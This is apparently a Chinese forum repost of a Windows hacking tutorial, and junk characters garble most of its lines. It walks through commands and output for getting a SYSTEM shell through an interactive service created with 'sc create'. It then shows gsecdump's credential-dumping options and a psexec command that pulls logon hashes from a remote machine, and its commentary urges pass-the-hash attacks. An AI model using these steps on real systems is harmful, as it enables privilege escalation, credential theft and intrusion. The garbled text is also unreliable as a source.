o get a DOS Prompt as NT system:; D$ O7 O) v* b. H: K* J
, |8 y1 X* q/ x3 tC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
' o1 X1 ~% w/ T7 j# Q4 s$ Q[SC] CreateService SUCCESS
7 ?" b/ f' H& p: B3 [6 u I6 y# B3 t
C:\>sc start shellcmdline0 A' k# g# ^" B, Y9 y1 {
[SC] StartService FAILED 1053:
7 m4 w7 B/ O4 ^' V
0 i3 F1 u0 [1 D* `The service did not respond to the start or control request in a timely fashion.
0 \ E- G" I. ~8 @/ p7 G
! ]# f6 `4 |% T1 v; }C:\>sc delete shellcmdline. q! M& o* S6 `2 s2 ~* p" S
[SC] DeleteService SUCCESS
. c+ i/ v/ ~5 T* V
& n" [6 ~; ^* U. r5 A0 o------------$ Y9 U& u% u' w7 m
+ m6 S2 S! {6 {% ?& cThen in the new DOS window:
9 M' D/ W4 S! p% r5 b2 v) A. w+ G) e; e. R$ t% U
Microsoft Windows XP [Version 5.1.2600]
# j( O. b, Y: _: O$ N$ |(C) Copyright 1985-2001 Microsoft Corp.& G: z/ j6 ?4 d" M) H6 h, G' [
( A' x9 [; F) V- k6 R$ e6 qC:\WINDOWS\system32>whoami
8 ~/ A' r. T) R; ?: \( BNT AUTHORITY\SYSTEM; h( @) e( @" b- e4 r% G4 W+ l
, o. Z u5 q7 Q9 r
C:\WINDOWS\system32>gsecdump -h. b6 O- L! N2 b& A
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se); x" `! E3 k1 d9 H* j+ d; P( Z
usage: gsecdump [options], F% [6 Q4 ]( V( _
, ]- N& C2 U% y u( Q2 U* Roptions:
8 K* {) i5 {% r x; D5 I. x-h [ --help ] show help) x% y5 `9 [( b. s
-a [ --dump_all ] dump all secrets
9 b/ E" V, _! n0 J. E9 X2 h-l [ --dump_lsa ] dump lsa secrets
6 M \ p; e+ U1 Q-w [ --dump_wireless ] dump microsoft wireless connections, x6 }/ X8 Z, h2 s7 g4 G& s$ O
-u [ --dump_usedhashes ] dump hashes from active logon sessions
% x8 I& h7 m7 n& |1 p- \& u- O-s [ --dump_hashes ] dump hashes from SAM/AD3 @# n! G8 d! P2 Z& z5 |, P
7 {- p4 s: Z: a! K0 }# ^
Although I like to use:) h0 X- @7 c/ ?$ w7 e
( q0 R" Z, i# e: b5 l+ P9 c
PsExec v1.83 - Execute processes remotely
+ w( v7 h) z. }4 Z- a3 mCopyright (C) 2001-2007 Mark Russinovich+ p5 {, l3 @# A1 E7 l! G
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
9 e9 }2 Y* `* O$ c
/ N; j' F: \0 H1 DC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 |2 R' [9 x. H% E) P
- f. y& n" n1 |. I' w% O! j. W# v
to get the hashes from active logon sessions of a remote system.
3 U9 q) m9 p* Z: Q7 c; i Y9 N2 `0 D8 B4 q- ?5 i {
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables., }( z# E! }) H9 F" {! s+ L
+ M+ b- m) A! J! x8 y- F3 a
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.' F ^! c$ x3 ]+ @5 H$ V" z! S) Y
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]7 F! _0 f3 b' l! j# g
6 i: ?% z& H. \ V我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。) O2 m; s( P H" F2 D
|
发表于 2012-11-6 21:09:29
收藏
支持
反对